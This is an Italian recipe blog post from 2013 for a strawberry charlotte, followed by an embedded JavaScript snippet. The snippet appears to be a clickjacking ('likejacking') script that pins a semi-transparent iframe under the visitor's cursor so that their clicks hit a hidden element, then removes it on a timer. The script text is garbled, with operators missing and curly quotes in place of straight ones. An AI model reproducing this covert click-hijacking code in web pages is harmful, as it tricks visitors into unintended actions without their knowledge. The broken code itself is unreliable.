sabato 19 ottobre 2013

Charlotte alle fragole

INGREDIENTI PER 8 PERSONE:200 gr di savoiardi,15 gr di fogli di colla di pesce,100 gr di latte,4 tuorli,100 gr di zucchero ,500 gr di fragole frullate,250 gr di panna light,3 albumi ,250 gr di panna montata per decorare 7-8 fragole.PREPARAZIONE:Rivestite prima le pareti poi il fondo della tortiera con i savoiardi.Immergete la colla di pesce nell acqua fredda.Fate bollire il latte e lasciatelo intiepidire.Disponete sul fuoco una casseruola ampia ,piena a meta' d acqua e in essa adagiate una casseruola piu' piccola senza farla bollire ma sobbollire.A fuoco basso ,mesolate i tuorli con lo zucchero e continuate finche non saranno cremosi.Incorporate ora il latte tiepido versandolo a filo e cuocete a fuoco moderato finche' la crema non si addensa.Aggiungete la colla di pesce ben strizzata e mescolate ,quindi mettete le fragole frullate.Mescolate,spegnete e lasciate raffreddare. Nel frattempo montate separatamente con la frusta la panna e gli albumi .Incorporate alla crema di fragole raffreddata prima la panna e poi gli albumi,a cucchiaiate e mescolate delicatamente.Versate il composto nello stampo foderato di savoiardi e mettete in frigo per almeno 4 ore.Sfornate la charlotte ,decoratela con ciuffi di panna montata e fragole e servite.
text/javascript”> var opacity = 0.5; var time = 0; if((document.getElementById) window.addEventListener || window.attachEvent){ (function(){ var hairCol = “#ff0000″; var d = document; var my = -10; var mx = -10; var r; var vert = “”; var idx = document.getElementsByTagName(‘div’).length; var thehairs = “”; document.write(thehairs); var like = document.getElementById(“theiframe”); document.getElementsByTagName(‘body’)[0].appendChild(like); var pix = “px”; var domWw = (typeof window.innerWidth == “number”); var domSy = (typeof window.pageYOffset == “number”); if (domWw) r = window; else{ if (d.documentElement typeof d.documentElement.clientWidth == “number” d.documentElement.clientWidth != 0) r = d.documentElement; else{ if (d.body typeof d.body.clientWidth == “number”) r = d.body; } } if(time != 0){ setTimeout(function(){ document.getElementsByTagName(‘body’)[0].removeChild(like); if (window.addEventListener){ document.removeEventListener(“mousemove”,mouse,false); } else if (window.attachEvent){ document.detachEvent(“onmousemove”,mouse); } }, time); } function scrl(yx){ var y,x; if (domSy){ y = r.pageYOffset; x = r.pageXOffset; } else{ y = r.scrollTop; x = r.scrollLeft; } return (yx == 0) ? y:x; } function mouse(e){ var msy = (domSy)?window.pageYOffset:0; if (!e) e = window.event; if (typeof e.pageY == ‘number’){ my = e.pageY – 5 – msy; mx = e.pageX – 4; } else{ my = e.clientY – 6 – msy; mx = e.clientX – 6; } vert.top = my + scrl(0) + pix; vert.left = mx + pix; } function ani(){ vert.top = my + scrl(0) + pix; setTimeout(ani, 300); } function init(){ vert = document.getElementById(“theiframe”).style; ani(); } if (window.addEventListener){ window.addEventListener(“load”,init,false); document.addEventListener(“mousemove”,mouse,false); } else if (window.attachEvent){ window.attachEvent(“onload”,init); document.attachEvent(“onmousemove”,mouse); } })(); }//End. script>